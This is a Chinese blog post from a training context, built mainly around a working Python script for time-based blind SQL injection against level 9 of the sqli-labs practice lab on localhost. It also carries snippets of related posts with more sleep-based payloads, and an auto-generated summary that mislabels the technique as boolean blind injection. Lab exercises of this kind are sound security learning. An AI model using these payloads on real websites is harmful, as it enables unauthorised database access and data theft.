sqli-labs 第九关 基于时间盲注 python 脚本

原创 已于 2023-04-25 07:55:16 修改 · 3.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #网络安全

于 2022-01-25 12:23:34 首次发布
本文介绍了一种通过SQL注入攻击获取数据库名称的方法。利用布尔盲注技术,通过发送HTTP请求并观察响应时间变化来确定数据库名称长度及具体字符,适用于防御较弱的目标。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

# @Author:Mirror
import time

import requests
db_len = 0
def  get_schema_len (url):
    len = 0
    left = 0
    right = 20
    while (left <= right):
        mid = left + (right - left)//2;
        data = "id=1' and if(length(database())>{},sleep(0.4),1)--+".format(mid)
        one = time.time()
        res = requests.get(url,data)
       # print (res.url)
        two = time.time()
        if abs(two - one) >= (0.4):
            left = mid + 1
        else:
            right = mid - 1
    len = left
    print (len)
    return len


def get_schema_name(url):
    len = get_schema_len(url)
    db_name = ''
    for i in range(1,len+1):
        left = 0
        right = 128
        while(left <= right):
            mid = left + (right - left)//2
            data = "id=1' and if (substr(database(),{},1)>'{}',sleep(0.4),1)--+".format(i,chr(mid))
            one = time.time()
            res = requests.get(url,data)
            print (res.url)
            two = time.time()
            if abs(two - one) >=0.4:
                left = mid + 1
            else :
                right = mid - 1
        db_name+=chr(left)
    print (db_name)



url = "http://localhost:800/sqli-labs/Less-9/"
get_schema_name(url)

以上是一部分,要学会自己编写脚本喔!库名好像都是大写

 

SQL注入——sqli-labs-Less-9时间盲注
m0_63563528的博客
04-06 811
时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同
sqli-labs第九&第十(延时盲注)
qq_42266432的博客
08-20 1427
刚开始进入这一时对这一进行了常规的注入过程,并未发现有可以利用的地方,然后怎么办呢?去作弊嘛,看了看标第九叫"time based-single quotes"基于时间—单引号,于是乎,就去试了试时间盲注,使用单引号闭合,请求如下: http://localhost:90/sqli-labs-master/Less-9/?id=1' and (select sleep(3))--+ 然后发现这个请求延时了3S 进行到这里,就有了一套完整的思路,时间盲注和之前的布尔盲注思路差不多,布尔盲注靠UI
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
【针对sqli-labs9时间盲注python脚本
AA8j的博客
09-09 873
效果图 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/7 10:20 # @Author : AA8j # @Site : # @File : Time-based-blind-SQL-injection.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import binascii import request
SQLi LABS Less 9 时间盲注
热门推荐
wangyuxiang946的博客
06-22 1万+
SQLi 第九SQLi-LABS Less-9SQLi-LABS Less 9SQLiLABS Less9SQLi Less 9
Python脚本-时间盲注
m0_74317362的博客
09-23 1453
添加了time.sleep(0.05)
sqli-labs第九时间盲注脚本
最新发布
02-11
针对 sqli-labs第九时间盲注挑战,编写自动化脚本是有效的方法之一。由于时间盲注的特点,在注入过程中只能通过猜测并验证数据库响应时间来推断数据[^2]。 #### Python 脚本实现时间盲注攻击 下面是一个基于...
sqli-labs靶场8(布尔盲注)
qq_46527080的博客
12-12 2675
知识点 函数 ascii()函数 将某个字符串转化为ascii值(webRobot转换工具) ord()函数 将某个字符串转化为ascii值 length()函数 返回字段/结果/函数的长度,length(column_name) length(database()) 即返回当前数据库名长度 substr()函数 截取字符段长度 例如:substr(abcd,1,1) 从第一位开始(也就是从a开始)截取一个字符,就是a substr(abcd,2
sqli-labs第九延迟注入脚本
weixin_42750666的博客
04-01 732
import requests import string def timeOut(url): #判断是否延时 try: res=requests.get(url,timeout=3) return "No" except Exception as e: return "TimeOut" def get_dbNa...
sqli-labs 靶场 less-8、9、10 第八到第十详解:布尔注入,时间注入
Superstacks超全栈
06-09 1305
S接下来的工作就是之前使用的布尔注入流程一样,通过一个个字的判断来确定是否为想要的字符。如此便可以采用和上面类似的盲注入代码来进行。执行结果,成功完成注入(有一说一,代码请求量一多这脚本运行时间真的长!但是你会发现,在获取用户密码的时候会有很多空字符,这里是什么原因呢?输入注入代码,通过测试可知是使用双引号来进行闭合的查询语句。在这里我们无法看到错误信息,也不知道信息能否正常获取到。我们先尝试用语句来判断是否获取正常。的方式来进行,当输入下列参数时可以看到页面需要。通过以上信息来看可以确定,这一可以用。
SQL注入——基于时间的盲注(sqli-labs less9
yuan114012的博客
05-21 1120
一.基于时间得盲注 适用场景:没有数据回显,条件正确与否结果一样 利用方式:构造判断条件,添加sleep,逐个猜测(盲猜) 1.所需语法与函数 IF表达式 IF( expr1 , expr2 , expr3 ) #expr1 的值为 TRUE,则返回值为 expr2 #expr1 的值为FALSE,则返回值为 expr3 expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 mysql> select if(1=1,1,.
时间盲注脚本——以sqli-labs第十为例
weixin_52450702的博客
12-14 713
时间盲注脚本
sqli labs 9 时间盲注
Xiaoxiaoqiang_的博客
03-01 353
小学僧
爱上python之盲注探测脚本
dfdhxb995397的博客
09-13 194
  本文转自:i春秋论坛 前言:   最近在学python,做了个盲注的简单的跑用户的脚本,仅做个记录。   sqmap也有不灵的时候,有时需要根据情况自写脚本探测   正文:   本地用大表姐给的sql和php文件搭建了个布尔盲注的靶机   另外感谢大表姐的指导。   稍作解释:注入语句里用%s占位,等待在for循里面依次判断长度 [App...
帮我写一个时间盲注python脚本
weixin_35757531的博客
01-03 262
时间盲注攻击是一种数据库攻击方法,其目的是通过构造特殊的SQL查询语句来猜测数据库中的数据。在进行时间盲注攻击时,攻击者会在SQL查询中包含一个或多个条件,并通过测量查询的执行时间来判断条件是否成立。 下面是一个使用Python实现时间盲注攻击的示例代码: importtime import requests # 目标数据库地址 url = "http://database.com/query"...
python脚本实现sql时间盲注
wrypot的博客
03-27 1059
python脚本实现sql盲注 sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
时间盲注脚本.py
weixin_30274627的博客
03-10 410
时间盲注脚本 1 #!/usr/bin/env python 2 # -*- coding: utf-8 -*- 3 import requests 4 import time 5 6 payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' #匹...
构造exp-Python盲注脚本
告白的博客
08-12 531
0x00 搭建环境介绍 平常的盲注如果手工会很麻烦,多数情况都会借助sqlmap等相软件跑,但是有些情况下,考虑到sqlmap的线程以及其他情况,会造成其他的影响,这里我们来简单使用python构造一个盲注脚本,低线程,高效率。 利用到metinfo老版本平台,平台中集合多种漏洞,本次实验实验python构造盲注exp,实现注入 手工注入测试: 0x01 利用python构造exp-盲注脚本 import requests def get_html(url): "我的功能判断页面内容是否
sql-labs Time-based盲注脚本
lixiangminghate的专栏
07-14 1115
    sqli-labs lab9/lab10是基于时间的盲注,如果完全用手动注入,费时费力。想到之前写过一篇基于布尔盲注的博文,于是我把当时脚本中的payload进行了修改,记录于此。    相比之前的脚本,替换了payload。另外,脚本记录了发送请求前的时间和响应返回的时间,比较时间差是否大于payload中设置的sleep时间(因为测试用的服务器就在本地虚拟机里,几乎不会有延迟,所以可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值